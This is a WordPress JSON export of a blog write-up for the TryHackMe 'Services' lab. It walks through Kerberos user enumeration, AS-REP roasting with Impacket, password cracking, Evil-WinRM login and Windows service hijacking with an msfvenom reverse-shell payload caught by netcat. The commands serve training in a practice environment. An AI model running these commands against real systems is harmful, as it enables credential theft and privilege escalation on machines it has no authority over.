{"id":504,"date":"2023-04-28T16:41:41","date_gmt":"2023-04-28T14:41:41","guid":{"rendered":"https:\/\/babdcatha.net\/?p=504"},"modified":"2023-04-30T18:14:12","modified_gmt":"2023-04-30T16:14:12","slug":"tryhackme-services","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/04\/28\/tryhackme-services\/","title":{"rendered":"TryHackMe : Services"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hi! The <a href=\"https:\/\/tryhackme.com\/room\/services\">Services<\/a> room was recently released on TryHackMe.com, and I wanted to take a look at it. The scenario isn&#8217;t really developed here, so let&#8217;s jump right into it.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">As always, once the target machine is started, we scan it using nmap to try to find open ports and services running on the machine. In this case, we find quite a few :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"942\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial.png\" alt=\"\" class=\"wp-image-508\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_initial-768x754.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We find a DNS server, a webserver, SMB and a lot of unknown services. 
The webpage is a generic website template :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"944\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website.png\" alt=\"\" class=\"wp-image-510\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website.png 962w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/website-768x754.png 768w\" sizes=\"auto, (max-width: 962px) 100vw, 962px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Enumerating it doesn&#8217;t return anything particularly interesting, and it seems that we cannot connect anonymously to the SMB service. We also cannot log in using rpcclient with no username. Maybe we can find usernames though ? Let&#8217;s check their website to see if we can find more info about the members of their organization.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">On the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">About us<\/mark> page, we find a few people :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large has-custom-border is-style-default wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"404\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-1024x404.png\" alt=\"\" class=\"wp-image-515\" style=\"border-style:none;border-width:0px;border-radius:30px\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-1024x404.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-300x118.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members-768x303.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/members.png 1183w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And, on the contact page, we 
find an email address, as well as their domain name, which we can add to our <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/etc\/hosts<\/mark> file :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large has-custom-border wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"413\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-1024x413.png\" alt=\"\" class=\"wp-image-517\" style=\"border-radius:30px\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-1024x413.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-300x121.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/contact-768x310.png 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Following this pattern, we can expect other addresses to be in the same format, so these usernames are also likely to exist :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>j.doe<\/li>\n\n\n\n<li>j.rock<\/li>\n\n\n\n<li>w.masters<\/li>\n\n\n\n<li>j.larusso<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">In order to check that, we can try using the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/security\/kerberos\/kerberos-authentication-overview\">Kerberos<\/a> service running on port 88. 
To do that, we can use an nmap script called <a href=\"https:\/\/nmap.org\/nsedoc\/scripts\/krb5-enum-users.html\">krb5-enum-users<\/a> with the following command :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='services.local',userdb=user_list.txt $TARGET_IP<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And indeed, the four users are recognized :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"415\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum.png\" alt=\"\" class=\"wp-image-524\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum-300x130.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/nmap_enum-768x332.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Maybe we can learn a bit more with another enumeration tool, present in the Metasploit Framework : the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">auxiliary\/gather\/kerberos_enumusers<\/mark> module. This will give us a bit more information about the target accounts, most notably whether they need pre-authentication or not. If for some users pre-authentication is disabled, we can perform an attack called AS_REP roasting. Basically, we will be able to get an unencrypted AS_REP response, and try to crack their password with it. 
This is the output we get when enumerating the accounts :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"942\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur.png\" alt=\"\" class=\"wp-image-527\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/metasploit_enum_blur-768x754.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay, the account of John Rock is vulnerable! Let&#8217;s get an AS_REP response using <a href=\"https:\/\/wadcoms.github.io\/wadcoms\/Impacket-GetNPUsers\/\">Impacket<\/a> with this command :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">python3 GetNPUsers.py services.local\/ -dc-ip $TARGET_IP -usersfile users_list.txt -format john -outputfile hash.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And then, let&#8217;s try to crack their password using john :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"411\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur.png\" alt=\"\" class=\"wp-image-531\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur-300x128.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/rock_pass_blur-768x329.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay! 
We now have john&#8217;s password, and we can try to connect to the different services running on the machine, and, the one on port 5985, WinRM, works for us ! We can connect using Evil-WinRM :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">evil-winrm -i $TARGET_IP -u 'j.rock' -p '$JOHN_PASS'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And we can now read the user flag :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"942\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur.png\" alt=\"\" class=\"wp-image-540\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur-300x294.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/evil_login_blur-768x754.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hurray, one of the two flags is ours ! 
Now, it&#8217;s time to get more privileges.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Since the room is called Services, it would probably be a good idea to look at the services running on the machine :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"346\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services.png\" alt=\"\" class=\"wp-image-544\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services-300x108.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/services-768x277.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we have a few services running with privileges; let&#8217;s see if we can modify any of them. If we can, we can then use them to start any program with escalated privileges.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To do just that, I could have used <a href=\"https:\/\/github.com\/carlospolop\/PEASS-ng\/tree\/master\/winPEAS\">WinPEAS<\/a> or <a href=\"https:\/\/github.com\/PowerShellEmpire\/PowerTools\/blob\/master\/PowerUp\/PowerUp.ps1\">PowerUp.ps1<\/a>, but instead, to better understand how these scripts work, I have created a small PowerShell script (here on <a href=\"https:\/\/github.com\/BabdCatha\/Powershell-writeable-services\">GitHub<\/a>). It is based on the code Evil-WinRM uses to enumerate services, and works by trying to change the service&#8217;s DisplayName to its current value &#8211; this doesn&#8217;t change anything if it works, but we get an error if we don&#8217;t have the permissions to modify the service. This allows us to know if we can modify the service or not. 
To use it, we need to specify the directory the script is placed in to Evil-WinRM when we launch it by using the -s option :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">evil-winrm -i $TARGET_IP -u 'j.rock' -p '$JOHN_PASS' -s \/path\/to\/script\/directory\/<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Once Evil-WinRM is launched with this option, we can load the file by typing its name, and then use the Get-Writeable-Services function defined inside. Here is what it gives us :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"471\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services.png\" alt=\"\" class=\"wp-image-550\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services-300x147.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/writeable_services-768x377.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here, we can see that a few privileged services are modifiable. We are going to use the vulnerable AWSLiteAgent service to get a reverse shell. 
First, we create our payload using msfvenom :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=$LOCAL_IP LPORT=4451 -f exe -o revshell.exe<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We can then upload it to the target machine, modify the service to use our reverse shell as its binary, and restart it :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"288\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service.png\" alt=\"\" class=\"wp-image-553\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service-300x90.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/modifying_service-768x230.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And, on the listener we created on our machine using :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">nc -lvnp 4451<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">We get our reverse shell as <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">NT AUTHORITY\\System<\/mark> ! Yay! 
We can now navigate to the Administrator&#8217;s desktop and get our flag :<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-12\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"326\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur.png\" alt=\"\" class=\"wp-image-554\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur-300x102.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/04\/root_flag_blur-768x261.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And that&#8217;s two out of two flags for this room ! I hope you enjoyed this little challenge, as it was a nice refresher on hijacking Windows services \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi! The Services room was recently released on TryHackMe.com, and I wanted to take a look at it. The scenario isn&#8217;t really developed here, so let&#8217;s jump right into it. As always, once the target machine is started, we scan it using nmap to try to find open ports and services running on the machine. 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[45,46,44,43,47,8],"class_list":["post-504","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-as_rep","tag-evil-winrm","tag-kerberos","tag-msrpc","tag-services","tag-tryhackme"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=504"}],"version-history":[{"count":40,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/504\/revisions"}],"predecessor-version":[{"id":559,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/504\/revisions\/559"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}